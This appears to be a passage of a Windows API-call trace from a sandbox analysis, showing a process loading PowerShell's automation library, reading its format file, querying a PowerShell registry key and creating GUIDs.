	[0343.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.168] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xbddcc18a, Data2=0xee87, Data3=0x47e9, Data4=([0]=0x98, [1]=0x9b, [2]=0x9f, [3]=0xd4, [4]=0x7b, [5]=0xa0, [6]=0xb6, [7]=0xa3))) returned 0x0
	[0343.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.170] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xdc85557e, Data2=0xa3c1, Data3=0x4ade, Data4=([0]=0xaa, [1]=0xd9, [2]=0xae, [3]=0x51, [4]=0x43, [5]=0xeb, [6]=0x13, [7]=0x48))) returned 0x0
	[0343.170] VirtualQuery (in: lpAddress=0x1ab5d0, lpBuffer=0x1ac490, dwLength=0x30 | out: lpBuffer=0x1ac490*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.170] VirtualQuery (in: lpAddress=0x1ab660, lpBuffer=0x1ac520, dwLength=0x30 | out: lpBuffer=0x1ac520*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.170] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6aff70a3, Data2=0x42fa, Data3=0x46fd, Data4=([0]=0xb8, [1]=0x18, [2]=0xa3, [3]=0x53, [4]=0xd0, [5]=0xb, [6]=0xb9, [7]=0x1b))) returned 0x0
	[0343.170] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6797c8d6, Data2=0xc090, Data3=0x464a, Data4=([0]=0xba, [1]=0x49, [2]=0x80, [3]=0xc1, [4]=0x45, [5]=0x90, [6]=0x88, [7]=0x60))) returned 0x0
	[0343.170] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xfe76fc5, Data2=0x788f, Data3=0x4e7f, Data4=([0]=0x95, [1]=0xb4, [2]=0xd5, [3]=0x17, [4]=0xaf, [5]=0xd6, [6]=0xfe, [7]=0x67))) returned 0x0
	[0343.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0343.171] SetErrorMode (uMode=0x1) returned 0x1
	[0343.172] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d0
	[0343.172] GetFileType (hFile=0x2d0) returned 0x1
	[0343.172] SetErrorMode (uMode=0x1) returned 0x1
	[0343.172] GetFileType (hFile=0x2d0) returned 0x1
	[0343.172] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.173] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.173] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.173] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.173] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.173] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.173] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.174] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.174] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.175] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.175] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.175] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.175] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.176] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.176] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.176] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.176] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.177] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.178] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.178] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.178] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.178] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0xe67, lpOverlapped=0x0) returned 1
	[0343.179] ReadFile (in: hFile=0x2d0, lpBuffer=0x301579f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x301579f*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0343.179] ReadFile (in: hFile=0x2d0, lpBuffer=0x30161d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x30161d0*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0343.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0343.179] SetErrorMode (uMode=0x1) returned 0x1
	[0343.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0343.179] SetErrorMode (uMode=0x1) returned 0x1
	[0343.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0343.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2d0) returned 0x0
	[0343.180] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0343.180] CoTaskMemAlloc (cb=0x5a) returned 0x1b8140b0
	[0343.180] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b8140b0, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0343.180] CoTaskMemFree (pv=0x1b8140b0) 
	[0343.180] RegCloseKey (hKey=0x2d0) returned 0x0
	[0343.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0343.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0343.181] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf0a985c9, Data2=0x7077, Data3=0x46ed, Data4=([0]=0xba, [1]=0x14, [2]=0xfb, [3]=0x3c, [4]=0x59, [5]=0xb0, [6]=0xef, [7]=0x64))) returned 0x0
	[0343.181] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x8a0ade16, Data2=0xf8dd, Data3=0x4331, Data4=([0]=0x98, [1]=0xbf, [2]=0xd6, [3]=0x9b, [4]=0x9d, [5]=0xea, [6]=0x13, [7]=0x18))) returned 0x0
	[0343.182] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x745215ff, Data2=0xad9c, Data3=0x4f2a, Data4=([0]=0xb6, [1]=0xd, [2]=0xbc, [3]=0x99, [4]=0x9d, [5]=0x86, [6]=0x4b, [7]=0x59))) returned 0x0
	[0343.182] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf40ae886, Data2=0x6455, Data3=0x4dac, Data4=([0]=0xbc, [1]=0x81, [2]=0x4a, [3]=0x30, [4]=0x4f, [5]=0x46, [6]=0x85, [7]=0x93))) returned 0x0
	[0343.182] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xccb474e1, Data2=0x9060, Data3=0x4d2e, Data4=([0]=0xaf, [1]=0x88, [2]=0xf8, [3]=0x7b, [4]=0x9b, [5]=0x9d, [6]=0xd5, [7]=0x6c))) returned 0x0
	[0343.182] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9043d17b, Data2=0xa234, Data3=0x452f, Data4=([0]=0x97, [1]=0x55, [2]=0x2f, [3]=0x28, [4]=0x30, [5]=0xb0, [6]=0xbc, [7]=0x50))) returned 0x0
	[0343.182] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x94c2de2a, Data2=0x27f6, Data3=0x4484, Data4=([0]=0x8b, [1]=0xb8, [2]=0x5a, [3]=0xf6, [4]=0x6f, [5]=0xbf, [6]=0xc0, [7]=0xfe))) returned 0x0
	[0343.182] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.182] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xb358688b, Data2=0x89ca, Data3=0x4f33, Data4=([0]=0xb1, [1]=0x93, [2]=0x23, [3]=0x53, [4]=0x5, [5]=0xcd, [6]=0x74, [7]=0x5c))) returned 0x0
	[0343.183] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xd2d9ba1, Data2=0xf2e4, Data3=0x486f, Data4=([0]=0xbc, [1]=0xa7, [2]=0xbc, [3]=0xa2, [4]=0xdd, [5]=0x55, [6]=0xc9, [7]=0xd))) returned 0x0
	[0343.183] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x5ad92f0f, Data2=0xf904, Data3=0x4a9c, Data4=([0]=0x9a, [1]=0x9d, [2]=0xae, [3]=0x3b, [4]=0xcd, [5]=0x3b, [6]=0xb5, [7]=0x52))) returned 0x0
	[0343.183] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xb68d4ef0, Data2=0xad8a, Data3=0x4474, Data4=([0]=0x98, [1]=0xcc, [2]=0x99, [3]=0x9a, [4]=0xfd, [5]=0x12, [6]=0xa0, [7]=0x5d))) returned 0x0
